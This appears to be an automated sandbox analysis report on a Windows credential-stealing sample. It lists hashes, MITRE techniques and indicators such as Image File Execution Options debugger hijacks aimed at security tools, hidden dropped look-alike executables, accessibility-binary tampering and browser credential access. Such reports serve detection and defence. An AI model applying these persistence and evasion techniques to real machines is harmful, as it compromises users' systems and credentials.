d9dc8934801540d9f484992bf8bdd55c36a454ece6469de322546754832d4b20

Analysis

max time kernel
149s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12/10/2024, 11:54

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

39dfbdc595913049289f361352e20211_JaffaCakes118.exe
Size

724KB
MD5

39dfbdc595913049289f361352e20211
SHA1

645e5d9dcf7ee54bae955229a3e4add839bad622
SHA256

d9dc8934801540d9f484992bf8bdd55c36a454ece6469de322546754832d4b20
SHA512

23792cb33d363abceff72aae812072f8e6f801338f45a16f99d49b054d6ec27539bc593b641e46415816c5012de9bf5d7bd1555c5f2eb99535f80e1912e2d690
SSDEEP

12288:Nrkv7b/IDlV7TmC6GEh5vcDe7RrW7SZFs1evzUyxwKE4nag9y8pEgK8sY6jYir:NabSyvGEfcDe7REsFv4ylRnzM7xRYir

Score

8^/10

discovery evasion persistence privilege_escalation spyware stealer

Malware Config

Signatures

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\111.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\x.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cc.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cike.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\296703.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\se.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\8.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\111.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\119.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iceswordcn.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rejoice2009.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cc.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nt.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aio.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\p.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\p.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\39.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Se2009.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysdown.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\all.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\se.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1066.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rejoice2009.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\296702.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2009.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINDOWS.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\119.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iceswordcn.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hacker.com.cn.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\112.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csc.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\0419.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\296702.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\296703.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\8.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1066.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sysdown.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2009.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINDOWS.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aio.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ant.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ant.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\all.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\112.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rejoice.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3389.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cike.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ft.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csc.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ft.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ck.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hacker.com.cn.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icesword.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\x.exe\debugger = "C:\\Windows\\repair\\1sass.exe"	reg.exe

Sets file to hidden 1 TTPs 48 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
788	attrib.exe
1748	attrib.exe
1756	attrib.exe
2472	attrib.exe
2404	attrib.exe
2196	attrib.exe
1036	attrib.exe
2236	attrib.exe
2428	attrib.exe
2300	attrib.exe
2512	attrib.exe
952	attrib.exe
2184	attrib.exe
1968	attrib.exe
2052	attrib.exe
1692	attrib.exe
2024	attrib.exe
1972	attrib.exe
1848	attrib.exe
2188	attrib.exe
1592	attrib.exe
1636	attrib.exe
760	attrib.exe
2352	attrib.exe
764	attrib.exe
2420	attrib.exe
1744	attrib.exe
2004	attrib.exe
2856	attrib.exe
1900	attrib.exe
2396	attrib.exe
2100	attrib.exe
1596	attrib.exe
1588	attrib.exe
2272	attrib.exe
2764	attrib.exe
2192	attrib.exe
608	attrib.exe
880	attrib.exe
1716	attrib.exe
776	attrib.exe
2400	attrib.exe
2200	attrib.exe
1976	attrib.exe
2480	attrib.exe
1308	attrib.exe
532	attrib.exe
2232	attrib.exe

Deletes itself 1 IoCs

pid	Process
1996	cmd.exe

Executes dropped EXE 64 IoCs

pid	Process
1324	IExp1orer.exe
2508	svchost.exe
2304	IExp1orer.exe
2812	IExp1orer.exe
2244	IExp1orer.exe
2780	IExp1orer.exe
2628	IExp1orer.exe
2164	svchost.exe
2616	IExp1orer.exe
668	IExp1orer.exe
1488	IExp1orer.exe
1332	IExp1orer.exe
760	svchost.exe
1140	IExp1orer.exe
1136	IExp1orer.exe
444	IExp1orer.exe
1504	IExp1orer.exe
1716	IExp1orer.exe
2296	IExp1orer.exe
2400	IExp1orer.exe
1564	IExp1orer.exe
2004	whw.exe
1588	whw.exe
2856	whw.exe
2476	IExp1orer.exe
2060	IExp1orer.exe
2504	whw.exe
2196	whw.exe
2756	whw.exe
1932	whw.exe
2848	whw.exe
2720	whw.exe
2712	whw.exe
2776	whw.exe
1352	whw.exe
2956	whw.exe
2812	whw.exe
2872	whw.exe
2708	whw.exe
2768	whw.exe
2580	whw.exe
2844	whw.exe
2732	whw.exe
1452	whw.exe
2576	whw.exe
2508	whw.exe
2572	whw.exe
2604	whw.exe
2796	whw.exe
2316	whw.exe
2380	whw.exe
576	whw.exe
2460	whw.exe
308	whw.exe
2028	whw.exe
1712	whw.exe
1608	whw.exe
668	whw.exe
1240	whw.exe
1640	whw.exe
1680	whw.exe
1276	whw.exe
2628	whw.exe
1148	whw.exe

Loads dropped DLL 64 IoCs

pid	Process
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
2476	regsvr32.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
2508	svchost.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
2164	svchost.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
760	svchost.exe
760	svchost.exe
760	svchost.exe
760	svchost.exe
760	svchost.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
1960	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
2392	cmd.exe
2392	cmd.exe
2164	svchost.exe
2404	cmd.exe
2404	cmd.exe
2392	cmd.exe
2392	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2404	cmd.exe
2404	cmd.exe
2392	cmd.exe
2392	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2392	cmd.exe
2392	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe
2532	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\NTSVC.ocx	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\NTSVC.OCX	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\netstat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ftp.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\log.exe	svchost.exe
File created	C:\Windows\SysWOW64\WScript.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\osk.exe	cmd.exe
File created	C:\Windows\SysWOW64\dllcache\chq.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\net1.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\tftp.exe	cmd.exe
File created	C:\Windows\SysWOW64\dllcache\whw.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\net.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WScript.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\netstat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sethc.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\sethc.exe	attrib.exe
File created	C:\Windows\SysWOW64\at.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\osk.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	attrib.exe
File created	C:\Windows\SysWOW64\ftp.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\cscript.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\net.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\dbug.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\log.exe	svchost.exe
File created	C:\Windows\SysWOW64\tftp.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\at.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\reg.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\ftp.exe	cmd.exe
File created	C:\Windows\SysWOW64\cscript.exe	cmd.exe
File created	C:\Windows\SysWOW64\at.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	attrib.exe
File created	C:\Windows\SysWOW64\net1.exe	cmd.exe
File created	C:\Windows\SysWOW64\ftp.exe	cmd.exe
File created	C:\Windows\SysWOW64\osk.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\reg.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	svchost.exe
File created	C:\Windows\SysWOW64\dllcache\whw.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\netstat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\logoff.exe	cmd.exe
File created	C:\Windows\SysWOW64\magnify.exe	cmd.exe
File created	C:\Windows\SysWOW64\net1.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\cscript.exe	cmd.exe
File created	C:\Windows\SysWOW64\netstat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\magnify.exe	cmd.exe
File created	C:\Windows\SysWOW64\magnify.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dbug.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\chq.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\log.exe	svchost.exe
File opened for modification	C:\Windows\SysWOW64\tftp.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\logoff.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\at.exe	cmd.exe
File created	C:\Windows\SysWOW64\osk.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\1sass.exe	svchost.exe
File created	C:\Windows\SysWOW64\WScript.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\whw.exe	attrib.exe

Drops file in Windows directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\inf\IExp1orer.exe	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File opened for modification	C:\Windows\inf\log.exe	svchost.exe
File opened for modification	C:\Windows\repair\1sass.exe	svchost.exe
File created	C:\Windows\inf\deltow.bat	svchost.exe
File opened for modification	C:\Windows\repair\1sass.exe	svchost.exe
File created	C:\Windows\inf\endexe.bat	svchost.exe
File created	C:\Windows\inf\stopexe.bat	svchost.exe
File opened for modification	C:\Windows\inf\svchost.exe	attrib.exe
File opened for modification	C:\Windows\inf\svchost.exe	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File opened for modification	C:\Windows\repair\1sass.exe	svchost.exe
File opened for modification	C:\Windows\repair\whw.exe	svchost.exe
File opened for modification	C:\Windows\inf\NTSVC.ocx	cmd.exe
File opened for modification	C:\Windows\inf\log.exe	attrib.exe
File opened for modification	C:\Windows\inf\NTSVC.ocx	attrib.exe
File opened for modification	C:\Windows\inf\log.exe	svchost.exe
File opened for modification	C:\Windows\inf\endexe.bat	svchost.exe
File created	C:\Windows\inf\deluser.bat	svchost.exe
File created	C:\Windows\inf\NTSVC.ocx	cmd.exe
File opened for modification	C:\Windows\inf\NTSVC.ocx	cmd.exe
File opened for modification	C:\Windows\inf\svchost.exe	attrib.exe
File opened for modification	C:\Windows\repair\sql.exe	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File opened for modification	C:\Windows\repair\false.exe	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File opened for modification	C:\Windows\inf\log.exe	svchost.exe
File created	C:\Windows\inf\delone.bat	svchost.exe
File opened for modification	C:\Windows\inf\log.exe	attrib.exe
File opened for modification	C:\Windows\inf\NTSVC.ocx	attrib.exe
File opened for modification	C:\Windows\repair\IExp1orer.exe	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File opened for modification	C:\Windows\inf\sql.exe	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
File created	C:\Windows\inf\endexe.bat	svchost.exe
File opened for modification	C:\Windows\repair\whw.exe	svchost.exe
File opened for modification	C:\Windows\repair\whw.exe	svchost.exe

Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	39dfbdc595913049289f361352e20211_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IExp1orer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe

Modifies registry class 60 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\NTService.Control.1\ = "NT Service Control"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E7BC34A3-BA86-11CF-84B1-CBC2DA68BF6C}\ToolboxBitmap32\ = "C:\\Windows\\SysWOW64\\NTSVC.ocx, 1"	regsvr32.exe
